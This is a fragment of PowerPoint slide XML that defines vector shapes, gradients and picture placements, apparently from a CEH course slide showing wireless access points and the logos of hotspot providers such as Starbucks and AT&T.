                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="762" y="1205"/>
                  <a:ext cx="904" cy="244"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 123 h 244"/>
                    <a:gd name="T2" fmla="*/ 451 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 123 h 244"/>
                    <a:gd name="T6" fmla="*/ 451 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 123 h 2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rgbClr val="FF993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77" name="Freeform 876"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1213" y="1328"/>
                  <a:ext cx="453" cy="589"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 121 h 589"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 468 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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rgbClr val="FF993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78" name="Freeform 877"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="762" y="1328"/>
                  <a:ext cx="451" cy="589"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 589 h 589"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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993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67" name="Group 882"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4142" y="1875"/>
                <a:ext cx="147" cy="308"/>
                <a:chOff x="4142" y="1875"/>
                <a:chExt cx="147" cy="308"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="868" name="Group 790"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="4142" y="1876"/>
                  <a:ext cx="147" cy="307"/>
                  <a:chOff x="2966" y="2390"/>
                  <a:chExt cx="413" cy="859"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="872" name="Freeform 791"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2966" y="2503"/>
                    <a:ext cx="413" cy="349"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 186 w 226"/>
                      <a:gd name="T1" fmla="*/ 107 h 191"/>
                      <a:gd name="T2" fmla="*/ 164 w 226"/>
                      <a:gd name="T3" fmla="*/ 113 h 191"/>
                      <a:gd name="T4" fmla="*/ 154 w 226"/>
                      <a:gd name="T5" fmla="*/ 49 h 191"/>
                      <a:gd name="T6" fmla="*/ 128 w 226"/>
                      <a:gd name="T7" fmla="*/ 24 h 191"/>
                      <a:gd name="T8" fmla="*/ 85 w 226"/>
                      <a:gd name="T9" fmla="*/ 13 h 191"/>
                      <a:gd name="T10" fmla="*/ 45 w 226"/>
                      <a:gd name="T11" fmla="*/ 2 h 191"/>
                      <a:gd name="T12" fmla="*/ 15 w 226"/>
                      <a:gd name="T13" fmla="*/ 12 h 191"/>
                      <a:gd name="T14" fmla="*/ 2 w 226"/>
                      <a:gd name="T15" fmla="*/ 85 h 191"/>
                      <a:gd name="T16" fmla="*/ 2 w 226"/>
                      <a:gd name="T17" fmla="*/ 85 h 191"/>
                      <a:gd name="T18" fmla="*/ 1 w 226"/>
                      <a:gd name="T19" fmla="*/ 89 h 191"/>
                      <a:gd name="T20" fmla="*/ 1 w 226"/>
                      <a:gd name="T21" fmla="*/ 89 h 191"/>
                      <a:gd name="T22" fmla="*/ 8 w 226"/>
                      <a:gd name="T23" fmla="*/ 106 h 191"/>
                      <a:gd name="T24" fmla="*/ 23 w 226"/>
                      <a:gd name="T25" fmla="*/ 106 h 191"/>
                      <a:gd name="T26" fmla="*/ 29 w 226"/>
                      <a:gd name="T27" fmla="*/ 105 h 191"/>
                      <a:gd name="T28" fmla="*/ 29 w 226"/>
                      <a:gd name="T29" fmla="*/ 105 h 191"/>
                      <a:gd name="T30" fmla="*/ 32 w 226"/>
                      <a:gd name="T31" fmla="*/ 104 h 191"/>
                      <a:gd name="T32" fmla="*/ 38 w 226"/>
                      <a:gd name="T33" fmla="*/ 102 h 191"/>
                      <a:gd name="T34" fmla="*/ 39 w 226"/>
                      <a:gd name="T35" fmla="*/ 68 h 191"/>
                      <a:gd name="T36" fmla="*/ 36 w 226"/>
                      <a:gd name="T37" fmla="*/ 69 h 191"/>
                      <a:gd name="T38" fmla="*/ 39 w 226"/>
                      <a:gd name="T39" fmla="*/ 47 h 191"/>
                      <a:gd name="T40" fmla="*/ 38 w 226"/>
                      <a:gd name="T41" fmla="*/ 165 h 191"/>
                      <a:gd name="T42" fmla="*/ 47 w 226"/>
                      <a:gd name="T43" fmla="*/ 175 h 191"/>
                      <a:gd name="T44" fmla="*/ 98 w 226"/>
                      <a:gd name="T45" fmla="*/ 189 h 191"/>
                      <a:gd name="T46" fmla="*/ 125 w 226"/>
                      <a:gd name="T47" fmla="*/ 170 h 191"/>
                      <a:gd name="T48" fmla="*/ 125 w 226"/>
                      <a:gd name="T49" fmla="*/ 153 h 191"/>
                      <a:gd name="T50" fmla="*/ 125 w 226"/>
                      <a:gd name="T51" fmla="*/ 124 h 191"/>
                      <a:gd name="T52" fmla="*/ 123 w 226"/>
                      <a:gd name="T53" fmla="*/ 88 h 191"/>
                      <a:gd name="T54" fmla="*/ 121 w 226"/>
                      <a:gd name="T55" fmla="*/ 75 h 191"/>
                      <a:gd name="T56" fmla="*/ 121 w 226"/>
                      <a:gd name="T57" fmla="*/ 71 h 191"/>
                      <a:gd name="T58" fmla="*/ 121 w 226"/>
                      <a:gd name="T59" fmla="*/ 75 h 191"/>
                      <a:gd name="T60" fmla="*/ 123 w 226"/>
                      <a:gd name="T61" fmla="*/ 88 h 191"/>
                      <a:gd name="T62" fmla="*/ 128 w 226"/>
                      <a:gd name="T63" fmla="*/ 121 h 191"/>
                      <a:gd name="T64" fmla="*/ 129 w 226"/>
                      <a:gd name="T65" fmla="*/ 123 h 191"/>
                      <a:gd name="T66" fmla="*/ 129 w 226"/>
                      <a:gd name="T67" fmla="*/ 123 h 191"/>
                      <a:gd name="T68" fmla="*/ 129 w 226"/>
                      <a:gd name="T69" fmla="*/ 127 h 191"/>
                      <a:gd name="T70" fmla="*/ 137 w 226"/>
                      <a:gd name="T71" fmla="*/ 147 h 191"/>
                      <a:gd name="T72" fmla="*/ 151 w 226"/>
                      <a:gd name="T73" fmla="*/ 153 h 191"/>
                      <a:gd name="T74" fmla="*/ 199 w 226"/>
                      <a:gd name="T75" fmla="*/ 139 h 191"/>
                      <a:gd name="T76" fmla="*/ 186 w 226"/>
                      <a:gd name="T77" fmla="*/ 107 h 1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226" h="191">
                        <a:moveTo>
                          <a:pt x="186" y="107"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="184" y="108"/>
                          <a:pt x="175" y="110"/>
                          <a:pt x="164" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="84"/>
                          <a:pt x="155" y="57"/>
                          <a:pt x="154" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="151" y="32"/>
                          <a:pt x="136" y="27"/>
                          <a:pt x="128" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="120" y="21"/>
                          <a:pt x="98" y="16"/>
                          <a:pt x="85" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="9"/>
                          <a:pt x="54" y="3"/>
                          <a:pt x="45" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="0"/>
                          <a:pt x="18" y="4"/>
                          <a:pt x="15" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="14"/>
                          <a:pt x="8" y="50"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                          <a:pt x="2" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                          <a:pt x="1" y="89"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="98"/>
                          <a:pt x="3" y="104"/>
                          <a:pt x="8" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="108"/>
                          <a:pt x="17" y="107"/>
                          <a:pt x="23" y="106"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                          <a:pt x="29" y="105"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="104"/>
                          <a:pt x="31" y="104"/>
                          <a:pt x="32" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="34" y="103"/>
                          <a:pt x="36" y="103"/>
                          <a:pt x="38" y="102"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                          <a:pt x="39" y="68"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="68"/>
                          <a:pt x="37" y="69"/>
                          <a:pt x="36" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="38" y="54"/>
                          <a:pt x="39" y="44"/>
                          <a:pt x="39" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="53"/>
                          <a:pt x="38" y="122"/>
                          <a:pt x="38" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="170"/>
                          <a:pt x="41" y="175"/>
                          <a:pt x="47" y="175"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="59" y="178"/>
                          <a:pt x="91" y="188"/>
                          <a:pt x="98" y="189"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="106" y="191"/>
                          <a:pt x="122" y="181"/>
                          <a:pt x="125" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="168"/>
                          <a:pt x="125" y="155"/>
                          <a:pt x="125" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                          <a:pt x="125" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="125" y="111"/>
                          <a:pt x="124" y="99"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="82"/>
                          <a:pt x="122" y="78"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="72"/>
                          <a:pt x="121" y="73"/>
                          <a:pt x="121" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="122" y="79"/>
                          <a:pt x="123" y="83"/>
                          <a:pt x="123" y="88"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="96"/>
                          <a:pt x="126" y="107"/>
                          <a:pt x="128" y="121"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="122"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                          <a:pt x="129" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                          <a:pt x="129" y="127"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="137"/>
                          <a:pt x="134" y="143"/>
                          <a:pt x="137" y="147"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="151"/>
                          <a:pt x="145" y="152"/>
                          <a:pt x="151" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="166" y="149"/>
                          <a:pt x="181" y="144"/>
                          <a:pt x="199" y="139"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="226" y="131"/>
                          <a:pt x="210" y="99"/>
                          <a:pt x="186" y="107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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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73" name="Freeform 792"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3178" y="2486"/>
                    <a:ext cx="109" cy="66"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 27 w 60"/>
                      <a:gd name="T1" fmla="*/ 34 h 36"/>
                      <a:gd name="T2" fmla="*/ 9 w 60"/>
                      <a:gd name="T3" fmla="*/ 20 h 36"/>
                      <a:gd name="T4" fmla="*/ 14 w 60"/>
                      <a:gd name="T5" fmla="*/ 11 h 36"/>
                      <a:gd name="T6" fmla="*/ 48 w 60"/>
                      <a:gd name="T7" fmla="*/ 14 h 36"/>
                      <a:gd name="T8" fmla="*/ 51 w 60"/>
                      <a:gd name="T9" fmla="*/ 26 h 36"/>
                      <a:gd name="T10" fmla="*/ 27 w 60"/>
                      <a:gd name="T11" fmla="*/ 34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0" h="36">
                        <a:moveTo>
                          <a:pt x="27" y="34"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="13" y="33"/>
                          <a:pt x="0" y="22"/>
                          <a:pt x="9" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="19"/>
                          <a:pt x="12" y="13"/>
                          <a:pt x="14" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="8"/>
                          <a:pt x="48" y="0"/>
                          <a:pt x="48" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="18"/>
                          <a:pt x="43" y="22"/>
                          <a:pt x="51" y="26"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="60" y="29"/>
                          <a:pt x="41" y="36"/>
                          <a:pt x="27" y="3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74" name="Freeform 793"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3150" y="2802"/>
                    <a:ext cx="165" cy="447"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 2 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="2" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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75" name="Oval 794"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3159" y="2390"/>
                    <a:ext cx="145" cy="145"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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69" name="Group 795"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4168" y="1875"/>
                  <a:ext cx="63" cy="34"/>
                  <a:chOff x="3198" y="2487"/>
                  <a:chExt cx="181" cy="96"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="870" name="Freeform 796"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3324" y="2499"/>
                    <a:ext cx="55" cy="43"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12 w 28"/>
                      <a:gd name="T1" fmla="*/ 22 h 22"/>
                      <a:gd name="T2" fmla="*/ 12 w 28"/>
                      <a:gd name="T3" fmla="*/ 22 h 22"/>
                      <a:gd name="T4" fmla="*/ 21 w 28"/>
                      <a:gd name="T5" fmla="*/ 5 h 22"/>
                      <a:gd name="T6" fmla="*/ 0 w 28"/>
                      <a:gd name="T7" fmla="*/ 4 h 22"/>
                      <a:gd name="T8" fmla="*/ 12 w 28"/>
                      <a:gd name="T9" fmla="*/ 2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8" h="22">
                        <a:moveTo>
                          <a:pt x="12" y="22"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                          <a:pt x="12" y="22"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="28" y="13"/>
                          <a:pt x="21" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="15" y="0"/>
                          <a:pt x="4" y="3"/>
                          <a:pt x="0" y="4"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="4"/>
                          <a:pt x="10" y="15"/>
                          <a:pt x="12" y="22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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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71" name="Freeform 797"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3198" y="2487"/>
                    <a:ext cx="150" cy="96"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 77 w 77"/>
                      <a:gd name="T1" fmla="*/ 28 h 49"/>
                      <a:gd name="T2" fmla="*/ 66 w 77"/>
                      <a:gd name="T3" fmla="*/ 11 h 49"/>
                      <a:gd name="T4" fmla="*/ 38 w 77"/>
                      <a:gd name="T5" fmla="*/ 1 h 49"/>
                      <a:gd name="T6" fmla="*/ 0 w 77"/>
                      <a:gd name="T7" fmla="*/ 38 h 49"/>
                      <a:gd name="T8" fmla="*/ 0 w 77"/>
                      <a:gd name="T9" fmla="*/ 38 h 49"/>
                      <a:gd name="T10" fmla="*/ 77 w 77"/>
                      <a:gd name="T11" fmla="*/ 28 h 49"/>
                      <a:gd name="T12" fmla="*/ 77 w 77"/>
                      <a:gd name="T13" fmla="*/ 28 h 49"/>
                      <a:gd name="T14" fmla="*/ 77 w 77"/>
                      <a:gd name="T15" fmla="*/ 28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7" h="49">
                        <a:moveTo>
                          <a:pt x="77" y="28"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="21"/>
                          <a:pt x="71" y="15"/>
                          <a:pt x="66" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="4"/>
                          <a:pt x="49" y="0"/>
                          <a:pt x="38" y="1"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="2"/>
                          <a:pt x="1" y="18"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                          <a:pt x="0" y="38"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="49"/>
                          <a:pt x="70" y="44"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28"/>
                          <a:pt x="77" y="28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996633"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="996633">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="996633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pic>
          <p:nvPicPr>
            <p:cNvPr id="879" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256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71668" y="4519253"/>
              <a:ext cx="524900" cy="5249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80" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256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80125" y="4498733"/>
              <a:ext cx="524900" cy="5249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81" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256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14449" y="4512180"/>
              <a:ext cx="524900" cy="5249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82" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5921626" y="4727464"/>
              <a:ext cx="1073534" cy="288388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83" name="Freeform 1054"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="4778626" y="4737008"/>
              <a:ext cx="1073534" cy="288388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pic>
          <p:nvPicPr>
            <p:cNvPr id="884" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256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2221" y="4526326"/>
              <a:ext cx="524900" cy="5249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85" name="Picture 3" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\access_point_256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01555" y="4519253"/>
              <a:ext cx="524900" cy="5249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86" name="Picture 4" descr="X:\Prashant\Starbucks_Coffee [Converted].png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05515" y="5128853"/>
              <a:ext cx="555295" cy="55529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87" name="Picture 5" descr="X:\Prashant\vodafone [Converted].png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80760" y="5039206"/>
              <a:ext cx="782183" cy="60356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88" name="Picture 6" descr="X:\Prashant\AT_and_T.png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7502" y="5108064"/>
              <a:ext cx="391285" cy="60258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89" name="Picture 9" descr="X:\Prashant\mcdonalds.png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11152" y="5124679"/>
              <a:ext cx="642652" cy="63163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90" name="Picture 10" descr="X:\Prashant\Verizon.png"/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44352" y="5330754"/>
              <a:ext cx="945923" cy="17706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91" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256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93803" y="1767956"/>
              <a:ext cx="389098" cy="3890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93" name="Rectangle 892"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
